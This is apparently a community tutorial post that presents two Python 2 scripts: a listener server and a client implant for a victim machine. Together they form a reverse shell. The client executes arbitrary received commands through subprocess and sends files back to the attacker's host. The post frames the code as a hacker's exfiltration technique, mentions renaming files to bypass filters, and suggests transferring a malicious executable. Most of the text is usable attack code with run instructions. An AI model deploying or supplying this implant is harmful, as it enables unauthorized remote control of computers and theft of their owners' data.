Python data_exfiltration with socket programming and network

December 19, 2017 | Views: 2760

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

 

dataexfiltration is the technic used by the hacker for unauthorized the transfer of data of victim Computer in the hacker computer. The hacker used malicous program to upload in the remote computer and after when the victim computer are infected , the hacker take the control of remote computer and start to exfiltred the data or files to his computer , or another name of this kind of hacking is extrusion the data , both is the same.

Socket Programming is a running process between computers. The process is accomplished by the communication. Generally, internet communication is the best way for communication. The implementation of this process is done with the API (Application Programming Interface) to communicate with the protocol stack.

A protocol stack is TCP. UDP protocols are the combination of IP addresses, and a port protocol is doing the transfer of information, packet, data in the network. This transfer of information in the network is controlled by the subprocesses. But, what are subprocesses? A subprocess in simple language is the technique used to take control of another process, or hijack another process, or spawn another process, or redirect another process in another process.

 

 

Now i want to explain how to program dataexfiltration with socket programming and networking in python language

The first computer is the server A >> Kali Linux  and configuration of interface

root# ifconfig eth0 192.168.1.15 netmask 255.255.255.0 up

data_exfiltration_server.py

 

#!/usr/bin/env python

 

import socket

import sys

import os

 

if len(sys.argv) <=2:

print “Usage python data_exfiltration_server.py <host> <port>”

exit()

def transfer(conn,command):

conn.send(command)

file_object = open(“/home/videos/test.png” , “wb”)

while True:

bits = conn.recv(1024)

if ‘Unable to find the file’ in bits:

print ‘[-] Unable to find file’

break

if bits.endswith(‘DONE’):

print ‘[+] Transfer Completed’

file_object.close()

break

file_object.write(bits)

def connect_server():

 

host = sys.argv[1]

port = int(sys.argv[2])

 

socket_object = socket.socket(socket.AF_INET , socket.SOCK_STREAM)

socket_object.bind((host , port))

socket_object.listen(1)

print ‘[+] Listening for incomming connection’

conn,addr = socket_object.accept()

print ‘[+] we got a connection from:’, addr

 

while True:

command = raw_input(“shell>”)

if ‘terminate’ in command:

conn.send(‘terminate’)

conn.close()

break

elif ‘grab’ in command:

transfer(conn,command)

else:

conn.send(command)

print conn.recv(1024)

connect_server()

explanation of the code :

 

import sys >> library for usage

import socket >> library for use socket and function

import os >> control all the system

 

def transfer(conn,command) >> function to transfer file and receive in the png format in the remote computer after rename the file in the real format this technic allowed the hacker to bypass easily the filter

 

host >> address to server

port >> port to server

 

socket.socket() >> function to connect with the api in the network

bind() >> function to client to connect in the server at this address and at this port

listen() >> wait the incomming connection of the client

accept() >> accept the incomming connection of the client

raw_input() >> open the shell if the connection with the client is good

grab command to transfer any file in the server

send() function to use for send the command

recv() function to use for receive the data who is transfered

execute the code:

python data_exfiltration_server.py 192.168.1.15 8080

Listening for incomming connection

 

Client B  >> windows7 and configure the interface with 192.168.1.12/24

#!/usr/bin/env python

import os

import socket

import subprocess

def transfer(socket_object,path):

if os.path.exists(path):

file_object = open(path, “rb”)

contents = file_object.read(1024)

while contents != ”:

socket_object.send(contents)

contents = file_object.read(1024)

socket_object.send(‘DONE’)

file_object.close()

else:

socket_object.send(‘Unable to find file’)

def connect_client():

socket_object = socket.socket(socket.AF_INET , socket.SOCK_STREAM)

socket_object.connect((‘192.168.1.15’ , 8080))

while True:

command = socket_object.recv(1024)

if ‘terminate’ in command:

sock_object.close()

break

 

elif ‘grab’ in command:

grab,path = command.split(‘*’)

try:

transfer(socket_object,path)

except Exception, e:

socket_object.send( str(e) )

pass

else:

cmd = subprocess.Popen(command , shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)

socket_object.send( cmd.stdout.read() )

socket_object.send( cmd.stderr.read() )

def main ():

connect_client()

main()

code explanation

import os >> os for system

import subprocess >> library for use subprocess funnction

import socket >> library for socket api in the network

def transfer(socket_object,path) >> now this the function to transfer the data to client in the server, read the content and send it into the server , powerful function

socket.socket() >> socket function

connect() >> connect to the server

subprocess.Popen() >> open the shell in the server

grab command to grab the data , and transfer the file in the server

connection the client to the server

python data_exfiltration_client.py 192.168.1.15 8080

and you have this in the server , the shell is open  , and grab the file to transfer the data in the remote computer

shell >> grab*file.exe

exemple if the client computer is windows7  , you transfer the malicious file.exe in the server and execute them in the server

This 2 programs is good to execute with 2 differents operating system

Server A is Kali Linux

Client B is windows7

— INSERT —                                                                                                                        1,8           Top

 

Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Ready to share your knowledge and expertise?
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play
 

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel